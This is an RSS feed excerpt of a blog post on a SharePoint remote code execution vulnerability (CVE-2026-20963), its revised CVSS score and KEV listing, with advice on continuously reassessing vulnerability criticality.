<b>About Remote Code Execution - Microsoft SharePoint (CVE-2026-20963) vulnerability.</b> This vulnerability was fixed in the <a href="https://avleonov.com/2026/01/13/1620-january-microsoft-patch-tuesday/">January MSPT</a>. At the time of the MSPT release on January 13, VM vendors did not highlight this vulnerability in their reviews, and Microsoft reported no evidence of exploitation in the wild. The CVSS vector was initially rated as CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (8.8). The "PR:L" indicates that authentication was required to exploit the vulnerability. However, on March 17, Microsoft <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20963">updated</a> both the vulnerability description and its CVSS vector. The updated CVSS vector is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8). The "PR:N" indicates that authentication is not required for exploitation.</p>
<p>Current vulnerability description:</p>
<p><i>"Deserialization of untrusted data (<a href="https://cwe.mitre.org/data/definitions/502.html">CWE-502</a>) in Microsoft Office SharePoint allows an unauthorized attacker to execute code over a network. In a network-based attack, an unauthenticated attacker could write arbitrary code to inject and execute code remotely on the SharePoint Server."</i></p>
<p>👾 On March 18, the vulnerability was <a href="https://www.cisa.gov/news-events/alerts/2026/03/18/cisa-adds-one-known-exploited-vulnerability-catalog-0">added to the CISA KEV catalog</a>. No detailed information about exploitation is available yet, and there are currently no public exploits. However, in terms of potential impact, this vulnerability may be comparable to last year's <a href="https://avleonov.com/2025/11/13/1605-about-remote-code-execution-microsoft-sharepoint/">RCE "ToolShell" (CVE-2025-49704)</a>.</p>
<p>The situation surrounding this vulnerability demonstrates that the criticality of any vulnerability cannot be determined once and for all. Indicators of exploitation in the wild or public exploits may emerge at any time, and the vendor may also revise the vulnerability description and CVSS metrics for various reasons. Therefore, all vulnerabilities detected within an infrastructure must be continuously monitored (either internally or via a VM vendor), with their criticality regularly reassessed and remediation deadlines adjusted accordingly.</p>
<p>Given that the status of any specific vulnerability may change at any time, it is not advisable to dismiss vulnerabilities as definitively non-critical or non-exploitable. A responsible approach assumes that all detected vulnerabilities require remediation, prioritized according to their continuously updated risk levels.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://avleonov.com/2026/04/03/i018-about-remote-code-execution-microsoft-sharepoint-cve202620963-vulnerability/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
